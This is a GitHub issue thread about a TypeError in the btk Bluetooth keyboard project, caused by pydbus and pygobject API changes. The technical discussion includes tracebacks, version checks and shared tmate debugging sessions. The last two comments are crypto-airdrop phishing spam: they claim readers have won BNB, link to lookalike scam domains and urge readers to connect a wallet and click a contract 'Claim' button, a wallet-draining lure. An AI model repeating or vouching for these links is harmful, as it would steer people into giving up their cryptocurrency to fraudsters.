### ISSUE TITLE
No 'method_call_closure' keyword argument

### ISSUE THREAD

**Issue by tknapstad** [lvht/btk#15]
Tried to run your code today, but got the following error:
```
  File "/home/pi/btk/dbus.py", line 18, in __init__
    bus.register_object(object_path=path, interface_info=interface_info, method_call_closure=self.on_method_call)
TypeError: register_object() got an unexpected keyword argument 'method_call_closure'
```
I tried both with the lates official pydbus (0.5.1) and your fork, but they both fail in the same manner.

Am I missing something?

**Comment by hh** [comment]
I'm getting the same thing in both python2 and python3:

```
root@chip:~/btk# python -V                                                                                                                                                    
Python 2.7.9                                                                                                                                                                  
root@chip:~/btk# python3 -V                                                                                                                                                   
Python 3.4.2                                                                                                                                                                  
root@chip:~/btk# python ./btk.py                                                                                                                                              
Traceback (most recent call last):                                                                                                                                            
  File "./btk.py", line 178, in <module>                                                                                                                                      
    loop()                                                                                                                                                                    
  File "./btk.py", line 164, in loop                                                                                                                                          
    profile = HIDProfile(bus.con, obj_path, sock)                                                                                                                             
  File "./btk.py", line 126, in __init__                                                                                                                                      
    Server.__init__(self, bus, path)                                                                                                                                          
  File "/root/btk/dbus.py", line 18, in __init__                                                                                                                              
    bus.register_object(object_path=path, interface_info=interface_info, method_call_closure=self.on_method_call)                                                             
TypeError: register_object() got an unexpected keyword argument 'method_call_closure'                                                                                         
root@chip:~/btk# python3 ./btk.py                                                                                                                                             
Traceback (most recent call last):                                                                                                                                            
  File "./btk.py", line 178, in <module>                                                                                                                                      
    loop()                                                                                                                                                                    
  File "./btk.py", line 164, in loop                                                                                                                                          
    profile = HIDProfile(bus.con, obj_path, sock)                                                                                                                             
  File "./btk.py", line 126, in __init__                                                                                                                                      
    Server.__init__(self, bus, path)                                                                                                                                          
  File "/root/btk/dbus.py", line 18, in __init__                                                                                                                              
    bus.register_object(object_path=path, interface_info=interface_info, method_call_closure=self.on_method_call)                                                             
TypeError: register_object() got an unexpected keyword argument 'method_call_closure'  
```

**Comment by hh** [comment]
Maybe things have changed?

@lvht what version of python and pydbus are you using?

We may need to have a lock file or something to denote which versions of python, and dependent libraries we have working.

https://github.com/LEW21/pydbus/blob/9d8d8c1d237cee70614e1df9f62e74ad7308f2fe/pydbus/registration.py#L111

```python

class RegistrationMixin:
	__slots__ = ()

	def register_object(self, path, object, node_info):
		if node_info is None:
			try:
				node_info = type(object).dbus
			except AttributeError:
				node_info = type(object).__doc__

		if type(node_info) != list and type(node_info) != tuple:
			node_info = [node_info]

		node_info = [Gio.DBusNodeInfo.new_for_xml(ni) for ni in node_info]
		interfaces = sum((ni.interfaces for ni in node_info), [])

		wrapper = ObjectWrapper(object, interfaces)
return ObjectRegistration(self.con, path, interfaces, wrapper, own_wrapper=True)
```

**Comment by hh** [comment]
```
In [70]: help(bus.register_object)
Help on method register_object in module pydbus.registration:

register_object(self, path, object, node_info) method of pydbus.bus.Bus instance
(END)```

**Comment by hh** [comment]
I tried reverting pydbus to the available versions with no success.
I may try again later, but I'm pretty much blocked at the moment as well.
Not sure what changed.

```
$ curl https://pypi.python.org/pypi/pydbus/json 2>/dev/null| grep :\ \\\[ | grep -v urls\\\|classifiers
        "0.1": [
        "0.3": [
        "0.2": [
        "0.5": [
        "0.5.1": [
```

**Comment by hh** [comment]
pydbus came out in March 8th, which was after @lvht worked got this working before your ticket.... possible something to look at?

**Comment by lvht** [comment]
@tknapstad sorry for trouble. pydbus has been added a new `register_object` method which overflow the one  the **gi.repository** offered, and made this error.

I can not fix this issue now, because my bluetooth RF adaptor is on my compony. I will work on it tomorrow.

And `register_object` should be replaced by the [publish](https://github.com/LEW21/pydbus/blob/master/doc/tutorial.rst#object-publication) method. PR will be greatly appreciated @tknapstad @hh 😄

**Comment by lvht** [comment]
@tknapstad @hh revert to pydbus 0.3 at 9fba2c67cf68e7b28e0b4210d64a92dc64acda67, please make test.

**Comment by hh** [comment]
I tried it on one machine and it works, but on another:

```
# python agent.py
Traceback (most recent call last):
  File "agent.py", line 129, in <module>
    open_hci()
  File "agent.py", line 117, in open_hci
    props.Set("org.bluez.Adapter1", "Discoverable", GLib.Variant.new_boolean(True))
  File "/usr/local/lib/python2.7/dist-packages/pydbus/bus.py", line 176, in functor
    0, self._bus.timeout, None).unpack()
GLib.Error: g-io-error-quark: Timeout was reached (24)
```

Probably local to that  machine. (a getchip.com that seems like a good target for this source code)

**Comment by hh** [comment]
It's interesting that I get a different error if I run it twice in a row:
```
root@chip:~/btk# python agent.py
Traceback (most recent call last):
  File "agent.py", line 129, in <module>
    open_hci()
  File "agent.py", line 117, in open_hci
    props.Set("org.bluez.Adapter1", "Discoverable", GLib.Variant.new_boolean(True))
  File "/usr/local/lib/python2.7/dist-packages/pydbus/bus.py", line 176, in functor
    0, self._bus.timeout, None).unpack()
GLib.Error: g-io-error-quark: Timeout was reached (24)
root@chip:~/btk# python agent.py
Traceback (most recent call last):
  File "agent.py", line 130, in <module>
    register_agent()
  File "agent.py", line 122, in register_agent
    agent = Agent(bus.con, path)
  File "/root/btk/dbus.py", line 18, in __init__
    bus.register_object(object_path=path, interface_info=interface_info, method_call_closure=self.on_method_call)
TypeError: register_object() got an unexpected keyword argument 'method_call_closure'
```

**Comment by hh** [comment]
I started a tmate session on the keyboard and will leave it up for a while if anyone wants' to take a look:

You can connect to this device via web at https://tmate.io/t/EFFXgv6rvURfuSAQFAFofLceG
or by using this with openssh: ```ssh EFFXgv6rvURfuSAQFAFofLceG@sf2.tmate.io```

```
# tmate show-messages 
Sun Aug  7 16:42:10 2016 [tmate] web session: https://tmate.io/t/EFFXgv6rvURfuSAQFAFofLceG
Sun Aug  7 16:42:10 2016 [tmate] ssh session: ssh EFFXgv6rvURfuSAQFAFofLceG@sf2.tmate.io
```

The keyboard attached is behind the GreenAsia USB adapter:

```
root@chip:~/btk# lsusb
Bus 002 Device 001: ID 1d6b:0001 Linux Foundation 1.1 root hub
Bus 001 Device 004: ID 0a12:0001 Cambridge Silicon Radio, Ltd Bluetooth Dongle (HCI mode)
Bus 001 Device 005: ID 0e8f:0020 GreenAsia Inc. USB to PS/2 Adapter
Bus 001 Device 006: ID 05ac:1402 Apple, Inc. Ethernet Adapter [A1277]
Bus 001 Device 003: ID 05e3:0608 Genesys Logic, Inc. USB-2.0 4-Port HUB
Bus 001 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
Bus 003 Device 001: ID 1d6b:0002 Linux Foundation 2.0 root hub
```

The code is in /root/btk:

```
root@chip:~/btk# pwd
/root/btk
root@chip:~/btk# git remote -v
lvht    https://github.com/lvht/btk.git (fetch)
lvht    https://github.com/lvht/btk.git (push)
origin  https://github.com/ii/btk.git (fetch)
origin  https://github.com/ii/btk.git (push)
```

There are two bluetooth adapters:

```
# bluetoothctl 
[NEW] Controller CC:79:DF:23:C2:2B chip #1 [default]
[NEW] Controller 00:1A:7D:DA:71:13 chip 
```

**Comment by hh** [comment]
I started up the tmate.io session again as root:

https://tmate.io/t/WUQEdPJmm86In83H4ZtlSKLgwh or

```
ssh WUQEdPJmm86In83H4ZtlSKLgw@sf2.tmate.io
```

**Comment by hh** [comment]
@lvht I'll leave this open for the next 24 hours or so.

**Comment by lvht** [comment]
@hh Are you online now?

**Comment by hh** [comment]
I'm looking at this again this morning.

**Comment by hh** [comment]
Fri Aug 12 15:59:02 2016 [tmate] web session: https://tmate.io/t/VmqHBOyOcLpz6vDBk4RbbHjCF
Fri Aug 12 15:59:02 2016 [tmate] ssh session: ssh VmqHBOyOcLpz6vDBk4RbbHjCF@sf2.tmate.io

**Comment by hh** [comment]
I think we should be using the SystemBus:

https://github.com/LEW21/pydbus/blob/master/doc/tutorial.rst#connecting-to-the-bus

```python
from pydbus import SystemBus
system_bus = SystemBus()
```

**Comment by hh** [comment]
I looked at the latest pydbus as well:

```
# cat requirements.txt 
future
evdev
PyBluez
#pydbus==0.5.1
-e git://github.com/LEW21/pydbus.git@d6c1a27a2bd17280f63b0093872ffa89d8658f08#egg=pydbus
```

But it will require a minor rewrite as for as I can tell following along with:

https://github.com/LEW21/pydbus/blob/master/doc/tutorial.rst#object-publication

**Comment by hh** [comment]
We got on the bus!

```
root@chip:~/btk# cat /usr/share/dbus-1/system-services/org.bluez.service 
[D-BUS Service]
Name=org.bluez
Exec=/bin/false
User=root
SystemdService=dbus-org.bluez.service
root@chip:~/btk# ipython
Python 2.7.9 (default, Mar  1 2015, 13:48:22) 
Type "copyright", "credits" or "license" for more information.

IPython 2.3.0 -- An enhanced Interactive Python.
?         -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help      -> Python's own help system.
object?   -> Details about 'object', use 'object??' for extra details.

In [1]: import pydbus ; bus= pydbus.SystemBus() ; bus.get('org.bluez')
Out[1]: <DBUS.<CompositeObject>(org.bluez.AgentManager1+org.bluez.ProfileManager1+org.bluez.Alert1+org.bluez.HealthManager1+org.freedesktop.DBus.Introspectable) at 0xb554cf70>
```

**Comment by hh** [comment]
I tried again using the SessionBus after starting a shell with ```dbus-run-session```, but I'm pretty sure that is dedicated to use around the org.freedesktop.DBus which seems to require X and maybe more:

```
root@chip:~/btk# dbus-run-session /bin/bash
root@chip:~/btk# ipython
Python 2.7.9 (default, Mar  1 2015, 13:48:22) 
Type "copyright", "credits" or "license" for more information.

IPython 2.3.0 -- An enhanced Interactive Python.
?         -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help      -> Python's own help system.
object?   -> Details about 'object', use 'object??' for extra details.

In [1]: import pydbus ; bus= pydbus.SessionBus() ; bus.get('org.bluez')               
---------------------------------------------------------------------------
Error                                     Traceback (most recent call last)
<ipython-input-1-96b528f17dd7> in <module>()
----> 1 import pydbus ; bus= pydbus.SessionBus() ; bus.get('org.bluez')

/root/btk/src/pydbus/pydbus/proxy.pyc in get(self, bus_name, object_path)
     40                         bus_name, object_path,
     41                         'org.freedesktop.DBus.Introspectable', "Introspect", None, GLib.VariantType.new("(s)"),
---> 42                         0, self.timeout, None).unpack()
     43 
     44                 introspection = ET.fromstring(xml)

Error: g-dbus-error-quark: GDBus.Error:org.freedesktop.DBus.Error.ServiceUnknown: The name org.bluez was not provided by any .service files (2)
````

**Comment by hh** [comment]
Docs on bluez:

```
# ipython
Python 2.7.9 (default, Mar  1 2015, 13:48:22) 
Type "copyright", "credits" or "license" for more information.

IPython 2.3.0 -- An enhanced Interactive Python.
?         -> Introduction and overview of IPython's features.
%quickref -> Quick reference.
help      -> Python's own help system.
object?   -> Details about 'object', use 'object??' for extra details.

In [1]: import pydbus ; help(pydbus.SystemBus().get('org.bluez'))

Help on <CompositeObject> object:

class <CompositeObject>(org.bluez.AgentManager1, org.bluez.ProfileManager1, org.bluez.Alert1, org.bluez.HealthManager1, org.freedesktop.DBus.Introspectable)
 |  Method resolution order:
 |      <CompositeObject>
 |      org.bluez.AgentManager1
 |      org.bluez.ProfileManager1
 |      org.bluez.Alert1
 |      org.bluez.HealthManager1
 |      org.freedesktop.DBus.Introspectable
 |      pydbus.proxy.ProxyObject
 |      __builtin__.object
 |  
 |  Methods defined here:
 |  
 |  __getitem__(self, iface)
 |  
 |  ----------------------------------------------------------------------
 |  Data and other attributes defined here:
 |  
 |  __qualname__ = '<CompositeObject>(org.bluez.AgentManager1+org.bl...alt...
 |  
 |  ----------------------------------------------------------------------
 |  Methods inherited from org.bluez.AgentManager1:
 |  
 |  RegisterAgent(...)
 |      RegisterAgent(self, agent:o, capability:s)
 |  
 |  RequestDefaultAgent(...)
 |      RequestDefaultAgent(self, agent:o)
 |  
 |  UnregisterAgent(...)
 |      UnregisterAgent(self, agent:o)
 |  
 |  ----------------------------------------------------------------------
 |  Methods inherited from org.bluez.ProfileManager1:
 |  
 |  RegisterProfile(...)
 |      RegisterProfile(self, profile:o, UUID:s, options:a{sv})
 |  
 |  UnregisterProfile(...)
 |      UnregisterProfile(self, profile:o)
 |  
 |  ----------------------------------------------------------------------
 |  Methods inherited from org.bluez.Alert1:
 |  
 |  NewAlert(...)
 |      NewAlert(self, category:s, count:q, description:s)
 |  
 |  RegisterAlert(...)
 |      RegisterAlert(self, category:s, agent:o)
 |  
 |  UnreadAlert(...)
 |      UnreadAlert(self, category:s, count:q)
 |  
 |  ----------------------------------------------------------------------
 |  Methods inherited from org.bluez.HealthManager1:
 |  
 |  CreateApplication(...)
 |      CreateApplication(self, config:a{sv}) -> o
 |  
 |  DestroyApplication(...)
 |      DestroyApplication(self, application:o)
 |  
 |  ----------------------------------------------------------------------
 |  Methods inherited from org.freedesktop.DBus.Introspectable:
 |  
 |  Introspect(...)
 |      Introspect(self) -> s
 |  
 |  ----------------------------------------------------------------------
 |  Methods inherited from pydbus.proxy.ProxyObject:
 |  
 |  __init__(self, bus, bus_name, path)
 |  
 |  ----------------------------------------------------------------------
 |  Data descriptors inherited from pydbus.proxy.ProxyObject:
 |  
 |  __dict__
 |      dictionary for instance variables (if defined)
 |  
 |  __weakref__
 |      list of weak references to the object (if defined)
```

**Comment by hh** [comment]
#16 get's us on the right bus and get's us on the [publish] (https://github.com/LEW21/pydbus/blob/master/doc/tutorial.rst#object-publication) method.

We still need to refactor a bit I think.

**Comment by hh** [comment]
From https://github.com/LEW21/pydbus#pydbus:

```
Since 0.5, it supports publishing objects on the bus - however this requires GLib 2.46 or newer.
```

That's quite a pain:

```
root@chip:~/btk# dpkg -l libglib2.0-bin
Desired=Unknown/Install/Remove/Purge/Hold
| Status=Not/Inst/Conf-files/Unpacked/halF-conf/Half-inst/trig-aWait/Trig-pend
|/ Err?=(none)/Reinst-required (Status,Err: uppercase=bad)
||/ Name              Version       Architecture  Description
+++-=================-=============-=============-========================================
ii  libglib2.0-bin    2.42.1-1+b1   armhf         Programs for the GLib library
```

**Comment by hh** [comment]
I reached out to @LEW21 to ask about targeting earlier versions. https://github.com/LEW21/pydbus/issues/20

I'll try and get 0.3 up and running again on this box later today.

**Comment by lvht** [comment]
@tknapstad this error is not caused by pydbus, but pygobject. Because the `bus` of `bus.register_object` is offered by pygobject at https://github.com/lvht/btk/blob/master/btk.py#L164

please offer you pygobject version.

**Comment by lvht** [comment]
@hh there is no need to downgrade the version of pydbus.

**Comment by lvht** [comment]
@hh and I reverted it.

**Comment by hh** [comment]
Is there a way to check for version of pygobject and offer different logic based on what's available?

**Comment by hh** [comment]
I'm on for a while:

https://tmate.io/t/KHk9YUSebjZELWhplKFJDYmj4
or
```ssh KHk9YUSebjZELWhplKFJDYmj4@sf2.tmate.io
````

**Comment by hh** [comment]
I'm in tmate and on https://gitter.im/lvht/Lobby

**Comment by lvht** [comment]
btk works well on my ArchLinux

**Comment by hh** [comment]
@lvht can you run ```pip freeze >> requirements_frozen.txt``` and commit it? (or put it here)

https://pip.pypa.io/en/stable/reference/pip_freeze/

**Comment by lvht** [comment]
@hh PyGObject is not installed by pip

**Comment by prezo-ci-bkp** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

Congratulations! You've won a share of the $500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](http://go.bnbcoinsearn.online/97Q7Yj)

## Steps to Claim:

### 1. Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://go.bnbcoinsearn.online/97Q7Yj) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

Don't miss out on your $1500 in BNB! Act now to secure your tokens.


Winners: @

**Comment by YuriyEmpty** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @fengluo, @od41, @nicksuell, @barddoo, @calehh, @spector-in-london, @fi-ma
